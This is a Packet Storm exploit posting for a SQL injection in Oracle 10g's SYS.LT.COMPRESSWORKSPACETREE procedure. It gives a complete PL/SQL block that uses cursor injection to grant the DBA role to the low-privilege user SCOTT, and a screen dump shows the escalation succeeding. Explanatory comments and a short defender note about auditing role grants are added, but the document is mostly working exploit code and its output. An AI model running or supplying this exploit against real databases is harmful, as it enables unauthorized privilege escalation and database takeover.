Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection

2009-07-02T00:00:00
ID PACKETSTORM:78864
Type packetstorm
Reporter Sumit Siddharth
Modified 2009-07-02T00:00:00

Description

                                        
                                            `This is a slightly modified version of: http://milw0rm.com/exploits/7677  
It is based on cursor injection and does not need create function privileges:  
  
-- Anonymous PL/SQL block. It parses a statement into a DBMS_SQL cursor, then passes  
-- that cursor's number inside a crafted workspace name to two SYS.LT procedures.  
-- The screen dump below runs it from a session whose user_role_privs rows belong to  
-- SCOTT, which holds only CONNECT, EXECUTE_CATALOG_ROLE and RESOURCE before the run.  
DECLARE  
-- D holds the cursor number returned by DBMS_SQL.OPEN_CURSOR.  
D NUMBER;  
BEGIN  
D := DBMS_SQL.OPEN_CURSOR;  
-- The parsed text is a nested anonymous block: it declares an autonomous transaction,  
-- issues the role grant through EXECUTE IMMEDIATE, and commits. The final 0 is the  
-- language_flag argument of DBMS_SQL.PARSE.  
-- NOTE(review): parsing alone presumably does not run the nested block; it only runs  
-- once something calls dbms_sql.execute on cursor D.  
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);  
-- The argument is a workspace name with an embedded quote, a predicate that calls  
-- dbms_sql.execute on cursor D, and a trailing comment marker. The cursor number is  
-- concatenated in, so the caller needs no function of its own.  
-- NOTE(review): presumably SYS.LT builds SQL by concatenating the workspace name and  
-- runs with its owner's rights, so the injected call executes with those rights. Confirm  
-- against the vendor advisory; this page does not show the SYS.LT source.  
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');  
-- Same crafted name passed to the procedure named in the title. In the screen dump the  
-- error stack points at line 7, which is this call.  
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');  
-- Defender note: in the dump the block ends with ORA-01403, yet SCOTT holds DBA  
-- afterwards. The nested block committed in its own autonomous transaction, so an error  
-- returned to the caller does not mean the grant was rolled back. Review role grants  
-- directly, for example in DBA_ROLE_PRIVS and the audit trail for GRANT statements,  
-- rather than relying on the error. Mitigation is the vendor's fix for SYS.LT, plus a  
-- review of who can execute SYS.LT and DBMS_SQL.  
end;  
  
#-----------screen dump---------------------------------------------------#  
SQL> select * from user_role_privs;  
  
USERNAME GRANTED_ROLE ADM DEF OS_  
------------------------------ ------------------------------ --- --- ---  
SCOTT CONNECT NO YES NO  
SCOTT EXECUTE_CATALOG_ROLE NO YES NO  
SCOTT RESOURCE NO YES NO  
  
SQL> DECLARE  
2 D NUMBER;  
3 BEGIN  
4 D := DBMS_SQL.OPEN_CURSOR;  
5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme  
diate ''grant dba to scott'';commit;end;',0);  
6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');  
7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');  
8 end;  
9  
10  
11 /  
DECLARE  
*  
ERROR at line 1:  
ORA-01403: no data found  
ORA-06512: at "SYS.LT", line 6118  
ORA-06512: at "SYS.LT", line 6087  
ORA-06512: at line 7  
  
  
SQL> select * from user_role_privs;  
  
USERNAME GRANTED_ROLE ADM DEF OS_  
------------------------------ ------------------------------ --- --- ---  
SCOTT CONNECT NO YES NO  
SCOTT DBA NO YES NO  
SCOTT EXECUTE_CATALOG_ROLE NO YES NO  
SCOTT RESOURCE NO YES NO  
  
  
Sid  
www.notsosecure.com  
  
  
`